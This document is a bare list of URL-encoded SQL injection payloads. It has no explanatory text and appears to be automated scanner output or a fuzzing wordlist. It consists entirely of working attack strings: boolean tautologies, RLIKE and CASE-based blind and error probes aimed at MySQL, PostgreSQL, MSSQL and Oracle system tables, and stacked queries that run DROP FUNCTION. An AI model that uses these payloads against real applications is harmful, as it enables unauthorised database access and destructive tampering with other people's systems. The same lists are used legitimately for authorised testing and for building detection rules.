-2599%22%29%20WHERE%204471%3D4471%20OR%20%283005%3D3655%29%20--%20 -2349%22%29%20WHERE%207123%3D7123%20OR%20%287983%3D7983%29%20--%20 -1505%22%29%20WHERE%205672%3D5672%20OR%20%282109%3D3119%29%20--%20 -6229%27%20WHERE%205016%3D5016%20OR%20%286878%3D7278%29%20--%20 -5430%27%20WHERE%208054%3D8054%20OR%20%287983%3D7983%29%20--%20 -3717%27%20WHERE%201598%3D1598%20OR%20%287047%3D9598%29%20--%20 -1832%22%20WHERE%203633%3D3633%20OR%20%287863%3D7011%29%20--%20 -6520%22%20WHERE%206171%3D6171%20OR%20%287983%3D7983%29%20--%20 -9671%22%20WHERE%204471%3D4471%20OR%20%289826%3D2565%29%20--%20 -6696%29%20OR%20%288831%3D3007%29%23 -2659%29%20OR%20%286254%3D6254%29%23 -8257%29%20OR%20%282673%3D8352%29%23 -1462%29%20OR%20%289943%3D5372%29%23 -2642%29%20OR%20%286254%3D6254%29%23 -6440%29%20OR%20%288598%3D4574%29%23 -5373%29%29%20OR%20%283285%3D4049%29%23 -4127%29%29%20OR%20%286254%3D6254%29%23 -4200%29%29%20OR%20%282706%3D2485%29%23 -2378%29%29%29%20OR%20%284451%3D5953%29%23 -1865%29%29%29%20OR%20%286254%3D6254%29%23 -1291%29%29%29%20OR%20%286423%3D5142%29%23 -3742%20OR%20%283320%3D8340%29%23 -1732%20OR%20%286254%3D6254%29%23 -3042%20OR%20%288240%3D1904%29%23 -4268%29%20WHERE%209578%3D9578%20OR%20%286008%3D8213%29%23 -9064%29%20WHERE%205783%3D5783%20OR%20%286254%3D6254%29%23 -5304%29%20WHERE%208506%3D8506%20OR%20%281045%3D6964%29%23 -6413%20WHERE%207525%3D7525%20OR%20%285400%3D8267%29%23 -4397%20WHERE%201145%3D1145%20OR%20%286254%3D6254%29%23 -8243%20WHERE%207240%3D7240%20OR%20%288299%3D6784%29%23 -7487%27%29%20OR%20%281346%3D2459%29%23 -1238%27%29%20OR%20%286254%3D6254%29%23 -2348%27%29%20OR%20%288606%3D9014%29%23 -2538%27%20OR%20%286725%3D1378%29%23 -4479%27%20OR%20%286254%3D6254%29%23 -2139%27%20OR%20%282245%3D5378%29%23 -7029%22%20OR%20%283724%3D6525%29%23 -6320%22%20OR%20%286254%3D6254%29%23 -2575%22%20OR%20%289076%3D1611%29%23 -3550%27%29%20OR%20%284367%3D5180%29%23 -4372%27%29%20OR%20%286254%3D6254%29%23 -3738%27%29%20OR%20%283507%3D3286%29%23 -7271%27%29%29%20OR%20%288342%3D6069%29%23 -8624%27%29%29%20OR%20%286254%3D6254%29%23 -3986%27%29%29%20OR%20%281159%3D3592%29%23 -6224%27%29%29%29%20OR%20%287144%3D4213%29%23 -5598%27%29%29%29%20OR%20%286254%3D6254%29%23 -7482%27%29%29%29%20OR%20%282818%3D2124%29%23 -3039%27%20OR%20%285826%3D4771%29%23 -7444%27%20OR%20%286254%3D6254%29%23 -6310%27%20OR%20%286894%3D9913%29%23 -3283%27%29%20OR%20%282209%3D7631%29%23 -4084%27%29%20OR%20%286254%3D6254%29%23 -3811%27%29%20OR%20%286208%3D8937%29%23 -1033%27%29%29%20OR%20%289665%3D6608%29%23 -3540%27%29%29%20OR%20%286254%3D6254%29%23 -9670%27%29%29%20OR%20%282962%3D7084%29%23 -8414%27%29%29%29%20OR%20%283551%3D5319%29%23 -6751%27%29%29%29%20OR%20%286254%3D6254%29%23 -7624%27%29%29%29%20OR%20%287612%3D2223%29%23 -6401%27%20OR%20%282199%3D6402%29%23 -6209%27%20OR%20%286254%3D6254%29%23 -7243%27%20OR%20%282579%3D1489%29%23 -9484%22%29%20OR%20%289165%3D5064%29%23 -2268%22%29%20OR%20%286254%3D6254%29%23 -8430%22%29%20OR%20%281084%3D1751%29%23 -1754%22%29%29%20OR%20%282144%3D7761%29%23 -5287%22%29%29%20OR%20%286254%3D6254%29%23 -2055%22%29%29%20OR%20%289010%3D4207%29%23 -2270%22%29%29%29%20OR%20%284582%3D3665%29%23 -8686%22%29%29%29%20OR%20%286254%3D6254%29%23 -2487%22%29%29%29%20OR%20%286836%3D7747%29%23 -1541%22%20OR%20%286550%3D8456%29%23 -3969%22%20OR%20%286254%3D6254%29%23 -6226%22%20OR%20%284008%3D6837%29%23 -9935%22%29%20OR%20%285994%3D5272%29%23 -4038%22%29%20OR%20%286254%3D6254%29%23 -1799%22%29%20OR%20%285172%3D1100%29%23 -7405%22%29%29%20OR%20%288687%3D6016%29%23 -2031%22%29%29%20OR%20%286254%3D6254%29%23 -6059%22%29%29%20OR%20%286497%3D7697%29%23 -5899%22%29%29%29%20OR%20%287293%3D5599%29%23 -3588%22%29%29%29%20OR%20%286254%3D6254%29%23 -4569%22%29%29%29%20OR%20%288879%3D8674%29%23 -1529%22%20OR%20%288390%3D8945%29%23 -1941%22%20OR%20%286254%3D6254%29%23 -5212%22%20OR%20%289705%3D5253%29%23 -5416%25%27%29%20OR%20%284502%3D6233%29%23 -7184%25%27%29%20OR%20%286254%3D6254%29%23 -4470%25%27%29%20OR%20%284469%3D7919%29%23 -5143%25%27%29%29%20OR%20%285028%3D8922%29%23 -9232%25%27%29%29%20OR%20%286254%3D6254%29%23 -2733%25%27%29%29%20OR%20%282241%3D3545%29%23 -3116%25%27%29%29%29%20OR%20%283758%3D9542%29%23 -7244%25%27%29%29%29%20OR%20%286254%3D6254%29%23 -9201%25%27%29%29%29%20OR%20%283325%3D5340%29%23 -5215%25%27%20OR%20%282719%3D7101%29%23 -7016%25%27%20OR%20%286254%3D6254%29%23 -5360%25%27%20OR%20%285989%3D6625%29%23 -7139%00%27%29%20OR%20%287764%3D8547%29%23 -3248%00%27%29%20OR%20%286254%3D6254%29%23 -1407%00%27%29%20OR%20%289976%3D6075%29%23 -8258%00%27%20OR%20%286095%3D1528%29%23 -2299%00%27%20OR%20%286254%3D6254%29%23 -6309%00%27%20OR%20%282309%3D8862%29%23 -2352%27%29%20WHERE%208229%3D8229%20OR%20%289977%3D6016%29%23 -2274%27%29%20WHERE%203861%3D3861%20OR%20%286254%3D6254%29%23 -5082%27%29%20WHERE%203865%3D3865%20OR%20%287465%3D2022%29%23 -6934%22%29%20WHERE%204028%3D4028%20OR%20%281646%3D6488%29%23 -3318%22%29%20WHERE%203612%3D3612%20OR%20%286254%3D6254%29%23 -4686%22%29%20WHERE%204476%3D4476%20OR%20%285481%3D2709%29%23 -9152%27%20WHERE%209244%3D9244%20OR%20%282901%3D6089%29%23 -1049%27%20WHERE%202420%3D2420%20OR%20%286254%3D6254%29%23 -8355%27%20WHERE%204790%3D4790%20OR%20%287251%3D3360%29%23 -2896%22%20WHERE%201128%3D1128%20OR%20%281946%3D2193%29%23 -6420%22%20WHERE%206828%3D6828%20OR%20%286254%3D6254%29%23 -8028%22%20WHERE%209385%3D9385%20OR%20%288274%3D6317%29%23 -5571%29%20OR%20%283007%3D3684%29--%20 -7912%29%20OR%20%284580%3D4580%29--%20 -3351%29%20OR%20%289643%3D9268%29--%20 -4452%29%20OR%20%286572%3D1248%29--%20 -3442%29%20OR%20%284580%3D4580%29--%20 -5398%29%20OR%20%282141%3D7727%29--%20 -2778%29%29%20OR%20%284181%3D6159%29--%20 -8266%29%29%20OR%20%284580%3D4580%29--%20 -1035%29%29%20OR%20%286788%3D2063%29--%20 -3816%29%29%29%20OR%20%284212%3D2491%29--%20 -6517%29%29%29%20OR%20%284580%3D4580%29--%20 -9666%29%29%29%20OR%20%286991%3D2653%29--%20 -6282%20OR%20%287522%3D3752%29--%20 -5721%20OR%20%284580%3D4580%29--%20 -5674%20OR%20%282729%3D1474%29--%20 -1735%29%20WHERE%206185%3D6185%20OR%20%284479%3D5567%29--%20 -6517%29%20WHERE%206223%3D6223%20OR%20%284580%3D4580%29--%20 -6470%29%20WHERE%202461%3D2461%20OR%20%284073%3D1324%29--%20 -2272%20WHERE%204290%3D4290%20OR%20%286700%3D5061%29--%20 -2943%20WHERE%207944%3D7944%20OR%20%284580%3D4580%29--%20 -9733%20WHERE%206914%3D6914%20OR%20%288425%3D5337%29--%20 -3562%27%29%20OR%20%284297%3D1034%29--%20 -8337%27%29%20OR%20%284580%3D4580%29--%20 -9476%27%29%20OR%20%283830%3D4581%29--%20 -1230%27%20OR%20%289805%3D5138%29--%20 -8218%27%20OR%20%284580%3D4580%29--%20 -9460%27%20OR%20%281927%3D3555%29--%20 -7417%22%20OR%20%287730%3D6316%29--%20 -1515%22%20OR%20%284580%3D4580%29--%20 -9133%22%20OR%20%283513%3D5849%29--%20 -8843%27%29%20OR%20%281002%3D8564%29--%20 -9380%27%29%20OR%20%284580%3D4580%29--%20 -7940%27%29%20OR%20%286906%3D8422%29--%20 -1119%27%29%29%20OR%20%288905%3D4997%29--%20 -8469%27%29%29%20OR%20%284580%3D4580%29--%20 -7763%27%29%29%20OR%20%286472%3D9974%29--%20 -3632%27%29%29%29%20OR%20%285769%3D8405%29--%20 -6618%27%29%29%29%20OR%20%284580%3D4580%29--%20 -3781%27%29%29%29%20OR%20%287469%3D8493%29--%20 -7605%27%20OR%20%286168%3D1462%29--%20 -2770%27%20OR%20%284580%3D4580%29--%20 -9620%27%20OR%20%281825%3D5537%29--%20 -6529%27%29%20OR%20%283585%3D1496%29--%20 -4894%27%29%20OR%20%284580%3D4580%29--%20 -7984%27%29%20OR%20%286543%3D1053%29--%20 -3244%27%29%29%20OR%20%282476%3D5899%29--%20 -7220%27%29%29%20OR%20%284580%3D4580%29--%20 -2564%27%29%29%20OR%20%281147%3D6579%29--%20 -3867%27%29%29%29%20OR%20%283710%3D8162%29--%20 -2931%27%29%29%29%20OR%20%284580%3D4580%29--%20 -1607%27%29%29%29%20OR%20%286974%3D6489%29--%20 -4640%27%20OR%20%287132%3D7766%29--%20 -9190%27%20OR%20%284580%3D4580%29--%20 -8113%27%20OR%20%286288%3D3875%29--%20 -7650%22%29%20OR%20%282279%3D9097%29--%20 -9725%22%29%20OR%20%284580%3D4580%29--%20 -6198%22%29%20OR%20%283020%3D7401%29--%20 -4113%22%29%29%20OR%20%282670%3D7662%29--%20 -2533%22%29%29%20OR%20%284580%3D4580%29--%20 -3746%22%29%29%20OR%20%281316%3D5910%29--%20 -8925%22%29%29%29%20OR%20%286692%3D6937%29--%20 -5237%22%29%29%29%20OR%20%284580%3D4580%29--%20 -7815%22%29%29%29%20OR%20%283824%3D8873%29--%20 -1415%22%20OR%20%287341%3D8075%29--%20 -4543%22%20OR%20%284580%3D4580%29--%20 -9260%22%20OR%20%284163%3D9159%29--%20 -7619%22%29%20OR%20%285746%3D5555%29--%20 -4457%22%29%20OR%20%284580%3D4580%29--%20 -5007%22%29%20OR%20%286337%3D9715%29--%20 -2528%22%29%29%20OR%20%285798%3D3662%29--%20 -7110%22%29%29%20OR%20%284580%3D4580%29--%20 -7270%22%29%29%20OR%20%289627%3D7117%29--%20 -5302%22%29%29%29%20OR%20%285483%3D8180%29--%20 -7288%22%29%29%29%20OR%20%284580%3D4580%29--%20 -2319%22%29%29%29%20OR%20%285454%3D5192%29--%20 -9105%22%20OR%20%285488%3D5646%29--%20 -9656%22%20OR%20%284580%3D4580%29--%20 -8137%22%20OR%20%281164%3D2329%29--%20 -7294%25%27%29%20OR%20%283830%3D7935%29--%20 -1360%25%27%29%20OR%20%284580%3D4580%29--%20 -2849%25%27%29%20OR%20%282214%3D5527%29--%20 -6369%25%27%29%29%20OR%20%289625%3D7325%29--%20 -2442%25%27%29%29%20OR%20%284580%3D4580%29--%20 -6569%25%27%29%29%20OR%20%287691%3D1987%29--%20 -8578%25%27%29%29%29%20OR%20%283630%3D1773%29--%20 -6939%25%27%29%29%29%20OR%20%284580%3D4580%29--%20 -2934%25%27%29%29%29%20OR%20%286886%3D6292%29--%20 -9152%25%27%20OR%20%284884%3D1309%29--%20 -8400%25%27%20OR%20%284580%3D4580%29--%20 -6620%25%27%20OR%20%288305%3D4864%29--%20 -3448%00%27%29%20OR%20%287934%3D8941%29--%20 -6278%00%27%29%20OR%20%284580%3D4580%29--%20 -1151%00%27%29%20OR%20%281299%3D7647%29--%20 -7261%00%27%20OR%20%282876%3D3125%29--%20 -8162%00%27%20OR%20%284580%3D4580%29--%20 -2424%00%27%20OR%20%288784%3D5884%29--%20 -2152%27%29%20WHERE%206566%3D6566%20OR%20%288569%3D4972%29--%20 -7007%27%29%20WHERE%204942%3D4942%20OR%20%284580%3D4580%29--%20 -1978%27%29%20WHERE%203783%3D3783%20OR%20%284381%3D2234%29--%20 -3408%22%29%20WHERE%208613%3D8613%20OR%20%281521%3D1165%29--%20 -2068%22%29%20WHERE%209758%3D9758%20OR%20%284580%3D4580%29--%20 -3866%22%29%20WHERE%209003%3D9003%20OR%20%288130%3D9585%29--%20 -5705%27%20WHERE%202885%3D2885%20OR%20%285904%3D1319%29--%20 -4838%27%20WHERE%208647%3D8647%20OR%20%284580%3D4580%29--%20 -4316%27%20WHERE%204776%3D4776%20OR%20%287498%3D5810%29--%20 -9352%22%20WHERE%205119%3D5119%20OR%20%281749%3D5985%29--%20 -9765%22%20WHERE%202785%3D2785%20OR%20%284580%3D4580%29--%20 -2805%22%20WHERE%202338%3D2338%20OR%20%284267%3D5648%29--%20 1%29%20RLIKE%20IF%286193%3D2272%2C1%2C0x28%29 1%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29 1%29%20RLIKE%20IF%286427%3D1352%2C1%2C0x28%29%20AND%20%288412%3D8412 1%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%285214%3D5214 1%29%29%20RLIKE%20IF%287737%3D2897%2C1%2C0x28%29%20AND%20%28%281712%3D1712 1%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%282291%3D2291 1%29%29%29%20RLIKE%20IF%286161%3D8440%2C1%2C0x28%29%20AND%20%28%28%284304%3D4304 1%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%284600%3D4600 1%20RLIKE%20IF%289704%3D5901%2C1%2C0x28%29 1%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29 1%29%20WHERE%201316%3D1316%20RLIKE%20IF%289151%3D4288%2C1%2C0x28%29%20--%20 1%29%20WHERE%209795%3D9795%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%20WHERE%202680%3D2680%20RLIKE%20IF%282559%3D2379%2C1%2C0x28%29%20--%20 1%20WHERE%207832%3D7832%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%27%29%20RLIKE%20IF%286031%3D4737%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29 1%27%20RLIKE%20IF%284856%3D3553%2C1%2C0x28%29 1%27%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29 1%22%20RLIKE%20IF%284772%3D9035%2C1%2C0x28%29 1%22%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%289658%3D2087%2C1%2C0x28%29%20AND%20%28%27IHIU%27%3D%27IHIU 1%27%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%27LAaz%27%3D%27LAaz 1%27%29%29%20RLIKE%20IF%283237%3D9405%2C1%2C0x28%29%20AND%20%28%28%27CjNr%27%3D%27CjNr 1%27%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%27tjaB%27%3D%27tjaB 1%27%29%29%29%20RLIKE%20IF%288831%3D2865%2C1%2C0x28%29%20AND%20%28%28%28%27AwEj%27%3D%27AwEj 1%27%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%28%27innD%27%3D%27innD 1%27%20RLIKE%20IF%284096%3D2506%2C1%2C0x28%29%20AND%20%27aIDN%27%3D%27aIDN 1%27%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%27tbla%27%3D%27tbla 1%27%29%20RLIKE%20IF%282886%3D1628%2C1%2C0x28%29%20AND%20%28%27SrPa%27%20LIKE%20%27SrPa 1%27%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%27XMyB%27%20LIKE%20%27XMyB 1%27%29%29%20RLIKE%20IF%286705%3D5546%2C1%2C0x28%29%20AND%20%28%28%27Pryj%27%20LIKE%20%27Pryj 1%27%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%27udQh%27%20LIKE%20%27udQh 1%27%29%29%29%20RLIKE%20IF%284110%3D3343%2C1%2C0x28%29%20AND%20%28%28%28%27iWgn%27%20LIKE%20%27iWgn 1%27%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%28%27liWU%27%20LIKE%20%27liWU 1%27%20RLIKE%20IF%287362%3D8219%2C1%2C0x28%29%20AND%20%27NqyP%27%20LIKE%20%27NqyP 1%27%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%27fuyH%27%20LIKE%20%27fuyH 1%22%29%20RLIKE%20IF%282847%3D4891%2C1%2C0x28%29%20AND%20%28%22gPUV%22%3D%22gPUV 1%22%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%22Coxq%22%3D%22Coxq 1%22%29%29%20RLIKE%20IF%289790%3D4322%2C1%2C0x28%29%20AND%20%28%28%22qwKX%22%3D%22qwKX 1%22%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%22AntN%22%3D%22AntN 1%22%29%29%29%20RLIKE%20IF%286704%3D4007%2C1%2C0x28%29%20AND%20%28%28%28%22HxZZ%22%3D%22HxZZ 1%22%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%28%22jrAU%22%3D%22jrAU 1%22%20RLIKE%20IF%288500%3D5666%2C1%2C0x28%29%20AND%20%22zbXK%22%3D%22zbXK 1%22%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%22dvXO%22%3D%22dvXO 1%22%29%20RLIKE%20IF%286221%3D2705%2C1%2C0x28%29%20AND%20%28%22ACdB%22%20LIKE%20%22ACdB 1%22%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%22TTpj%22%20LIKE%20%22TTpj 1%22%29%29%20RLIKE%20IF%288824%3D2705%2C1%2C0x28%29%20AND%20%28%28%22NtsC%22%20LIKE%20%22NtsC 1%22%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%22gCOO%22%20LIKE%20%22gCOO 1%22%29%29%29%20RLIKE%20IF%284713%3D4196%2C1%2C0x28%29%20AND%20%28%28%28%22sOwu%22%20LIKE%20%22sOwu 1%22%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%28%22ZEDQ%22%20LIKE%20%22ZEDQ 1%22%20RLIKE%20IF%286630%3D1295%2C1%2C0x28%29%20AND%20%22MVuB%22%20LIKE%20%22MVuB 1%22%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%22jbVT%22%20LIKE%20%22jbVT 1%25%27%29%20RLIKE%20IF%289456%3D1416%2C1%2C0x28%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20RLIKE%20IF%286862%3D9868%2C1%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20RLIKE%20IF%285618%3D6064%2C1%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%29%29%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20RLIKE%20IF%288847%3D7053%2C1%2C0x28%29%20AND%20%27%25%27%3D%27 1%25%27%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%27%25%27%3D%27 1%00%27%29%20RLIKE%20IF%287490%3D8524%2C1%2C0x28%29%20AND%20%28%27ciqI%27%3D%27ciqI 1%00%27%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%28%27gzcT%27%3D%27gzcT 1%00%27%20RLIKE%20IF%287189%3D3243%2C1%2C0x28%29%20AND%20%27EaRJ%27%3D%27EaRJ 1%00%27%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20AND%20%27gdrl%27%3D%27gdrl 1%27%29%20WHERE%201009%3D1009%20RLIKE%20IF%281455%3D3112%2C1%2C0x28%29%20--%20 1%27%29%20WHERE%204551%3D4551%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%22%29%20WHERE%201175%3D1175%20RLIKE%20IF%282600%3D1059%2C1%2C0x28%29%20--%20 1%22%29%20WHERE%203741%3D3741%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%27%20WHERE%208761%3D8761%20RLIKE%20IF%284827%3D5354%2C1%2C0x28%29%20--%20 1%27%20WHERE%202829%3D2829%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%22%20WHERE%207229%3D7229%20RLIKE%20IF%283927%3D3233%2C1%2C0x28%29%20--%20 1%22%20WHERE%202628%3D2628%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20--%20 1%27%7C%7C%28SELECT%20%27BaFc%27%20FROM%20DUAL%20WHERE%205694%3D5694%20RLIKE%20IF%284622%3D8434%2C1%2C0x28%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27Floa%27%20FROM%20DUAL%20WHERE%208609%3D8609%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27vSTR%27%20WHERE%202508%3D2508%20RLIKE%20IF%282621%3D4387%2C1%2C0x28%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27dZAO%27%20WHERE%203030%3D3030%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20%29%7C%7C%27 1%27%2B%28SELECT%20ufbB%20WHERE%207508%3D7508%20RLIKE%20IF%281790%3D6898%2C1%2C0x28%29%20%29%2B%27 1%27%2B%28SELECT%20Dwcw%20WHERE%202391%3D2391%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20%29%2B%27 1%27%2B%28SELECT%20%27qFMN%27%20WHERE%203785%3D3785%20RLIKE%20IF%281407%3D7069%2C1%2C0x28%29%20%29%2B%27 1%27%2B%28SELECT%20%27Ycon%27%20WHERE%204451%3D4451%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%284960%3D8248%2C1%2C0x28%29%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%283739%3D3739%2C1%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%281034%3D9838%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%288319%3D8319%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%288800%3D6193%2C1%29 MAKE_SET%286280%3D6280%2C1%29 ELT%282280%3D2198%2C1%29 ELT%286195%3D6195%2C1%29 %285550%3D8168%29%2A1 %284650%3D4650%29%2A1 %28SELECT%20%28CASE%20WHEN%20%287205%3D1397%29%20THEN%201%20ELSE%207205%2A%28SELECT%207205%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281672%3D1672%29%20THEN%201%20ELSE%201672%2A%28SELECT%201672%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%284400%3D7787%29%20THEN%201%20ELSE%204400%2A%28SELECT%204400%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281739%3D1739%29%20THEN%201%20ELSE%201739%2A%28SELECT%201739%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%281%2C1%2CCASE%20WHEN%20%281721%3D5542%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%281%2C1%2CCASE%20WHEN%20%283386%3D3386%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%286720%3D8338%29%20THEN%201%20ELSE%206720%2A%28SELECT%206720%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287484%3D7484%29%20THEN%201%20ELSE%207484%2A%28SELECT%207484%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281126%3D4683%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%287616%3D7616%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 IIF%289213%3D9917%2C1%2C1%2F0%29 IIF%284666%3D4666%2C1%2C1%2F0%29 %28CASE%20WHEN%206573%3D7620%20THEN%201%20ELSE%20NULL%20END%29 %28CASE%20WHEN%204162%3D4162%20THEN%201%20ELSE%20NULL%20END%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286555%3D9692%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%288323%3D8323%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%282241%3D2917%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%284999%3D4999%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%286854%3D3591%29%20THEN%201%20ELSE%206854%2A%28SELECT%206854%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%285886%3D5886%29%20THEN%201%20ELSE%205886%2A%28SELECT%205886%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281700%3D6000%29%20THEN%201%20ELSE%201700%2A%28SELECT%201700%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%287103%3D7103%29%20THEN%201%20ELSE%207103%2A%28SELECT%207103%20FROM%20mysql.db%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281280%3D1464%29%20THEN%201%20ELSE%201280%2A%28SELECT%201280%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%284388%3D4388%29%20THEN%201%20ELSE%204388%2A%28SELECT%204388%20FROM%20master..sysdatabases%29%20END%29%29 1%2C%28SELECT%20%28CASE%20WHEN%20%281824%3D5411%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2C%28SELECT%20%28CASE%20WHEN%20%283701%3D3701%29%20THEN%201%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1%2CIIF%287927%3D5768%2C1%2C1%2F0%29 1%2CIIF%285187%3D5187%2C1%2C1%2F0%29 1%29%3B%20IF%28%288554%3D4842%29%2CSELECT%208554%2CDROP%20FUNCTION%20UXOU%29%23 1%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%29%3B%20IF%28%283603%3D8073%29%2CSELECT%203603%2CDROP%20FUNCTION%20OZHg%29%23 1%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%29%29%3B%20IF%28%286320%3D4738%29%2CSELECT%206320%2CDROP%20FUNCTION%20NXbR%29%23 1%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%29%29%29%3B%20IF%28%282286%3D5827%29%2CSELECT%202286%2CDROP%20FUNCTION%20lAuN%29%23 1%29%29%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%3B%20IF%28%289406%3D2922%29%2CSELECT%209406%2CDROP%20FUNCTION%20QdBQ%29%23 1%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%29%20WHERE%207651%3D7651%3B%20IF%28%283421%3D6613%29%2CSELECT%203421%2CDROP%20FUNCTION%20KpvY%29%23 1%29%20WHERE%203056%3D3056%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%20WHERE%202514%3D2514%3B%20IF%28%284125%3D6252%29%2CSELECT%204125%2CDROP%20FUNCTION%20LLks%29%23 1%20WHERE%209003%3D9003%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%29%3B%20IF%28%284490%3D6514%29%2CSELECT%204490%2CDROP%20FUNCTION%20KGMa%29%23 1%27%29%3B%20IF%28%283730%3D3730%29%2CSELECT%203730%2CDROP%20FUNCTION%20PfiY%29%23 1%27%3B%20IF%28%288810%3D7051%29%2CSELECT%208810%2CDROP%20FUNCTION%20RChd%29%23 